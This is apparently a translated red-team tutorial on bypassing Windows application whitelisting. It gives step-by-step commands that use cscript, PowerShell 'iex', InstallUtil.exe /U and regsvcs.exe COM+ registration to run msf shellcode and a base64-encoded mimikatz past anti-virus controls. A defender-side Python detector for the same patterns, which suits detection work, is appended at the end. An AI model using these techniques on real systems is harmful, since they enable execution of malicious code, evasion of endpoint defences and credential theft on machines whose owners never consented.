Bypassing Protections Using Whitelisted Applications
0x01 Script Execution
In some cases, for example when .bat, .vbs or .ps1 scripts are restricted, the restriction can be bypassed with the following methods:
.bat  cmd.exe /k
.vbs  cscript.exe //E:vbscript script.txt
.ps1  Get-Content script.txt | iex
During testing, pay attention to file encoding. If you create a new file by hand and write "net user" into it as a test, you will find that the file fails to run, so create it with echo instead.
0x01 Using InstallUtil.exe to execute a program
In some cases an attacker cannot run .exe files on the web server, or the anti-virus software blocks them. This method bypasses that detection. Of course, the environment must have .NET 4.0 or above.
1. Generate shellcode directly with msf and execute it
Step One:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
Step Two:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Of course, you can also perform the first step locally and then upload the compiled exe to the server for the second step.
2. Execute a PE file directly (run mimikatz)
For a PE file, the file must first be base64-encoded. There are two methods:
* Base64-encode mimikatz in PowerShell:
$fileName = "mimikatz.exe"
# Read the raw bytes; Get-Content followed by UTF8.GetBytes would corrupt a binary file
$fileContentBytes = [System.IO.File]::ReadAllBytes($fileName)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | Set-Content ($fileName + ".b64")
* [OR] in C#:
using System;
using System.IO;
byte[] AsBytes = File.ReadAllBytes(@"C:\Tools\Mimikatz.exe");
String AsBase64String = Convert.ToBase64String(AsBytes);
StreamWriter sw = new StreamWriter(@"C:\Tools\Mimikatz.b64");
sw.Write(AsBase64String);
sw.Close();
Then use it the same way as above:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
0x02 Using a COM+ application
Write our malicious shellcode into a COM+ application:
1: [.NET SDK] sn.exe -k key.snk
2: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /keyfile:key.snk /target:library /out:dllguest.dll dllguest.cs
3: [As Administrator] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe dllguest.dll
4: [From PowerShell] $B = New-Object -ComObject dllguest.Bypass
OR
[From VBScript] Dim obj : Set obj = CreateObject("dllguest.Bypass")
Using the original demo:
Although the demo was not perfect and produced a lot of errors during testing, it already demonstrates the author's goal of "using a whitelisted application to execute malicious code".
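As an added, defender-side example that is not part of the original article: a small Python detector that runs over constructed process-creation records (Sysmon Event ID 1 style) and flags the patterns described in the sections above, namely InstallUtil.exe invoked with /U, regsvcs.exe or regasm.exe registering a DLL from outside the Windows and Program Files directories, cscript.exe forcing the VBScript engine onto a non-.vbs file, and Get-Content piped into iex. The record field names, sample paths and rule names are assumptions, not taken from the article or from any real telemetry.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records (Sysmon Event ID 1 style, simplified; not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\web\exeshell.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "CommandLine": r"regsvcs.exe C:\Users\web\dllguest.dll"},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe //E:vbscript C:\Users\web\script.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c Get-Content script.txt | iex"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r'InstallUtil.exe "C:\Program Files\Vendor\Service.exe"'},  # benign install
]

# Directories where registering code is expected; anything else is treated as user-writable.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def _last_arg(cmdline):
    """Final command-line token, honouring double quotes around paths with spaces."""
    tokens = re.findall(r'"([^"]+)"|(\S+)', cmdline)
    quoted, bare = tokens[-1] if tokens else ("", "")
    return quoted or bare

def _untrusted(path):
    return not path.lower().startswith(TRUSTED_DIRS)

def classify(event):
    """Return the rule names that fire for one process-creation event."""
    image = PureWindowsPath(event["Image"]).name.lower()
    cmd = event["CommandLine"]
    hits = []
    # /U makes InstallUtil run the assembly's Uninstall() code, so it is the flag worth watching.
    if image == "installutil.exe" and re.search(r"(?i)(^|\s)/u(\s|$)", cmd):
        hits.append("installutil_uninstall_exec")
    if image in ("regsvcs.exe", "regasm.exe") and _untrusted(_last_arg(cmd)):
        hits.append("regsvcs_untrusted_dll")
    if image == "cscript.exe" and "//e:vbscript" in cmd.lower() and not _last_arg(cmd).lower().endswith(".vbs"):
        hits.append("cscript_engine_override")
    if image in ("powershell.exe", "pwsh.exe") and re.search(r"(?i)get-content.*\|\s*iex\b", cmd):
        hits.append("powershell_get_content_iex")
    return hits

def scan(events):
    """Map event index -> rule hits for every event that triggers at least one rule."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

In a real deployment the benign baseline (vendor installers calling InstallUtil without /U, build servers running csc.exe) should be tuned per environment before alerting on these rules.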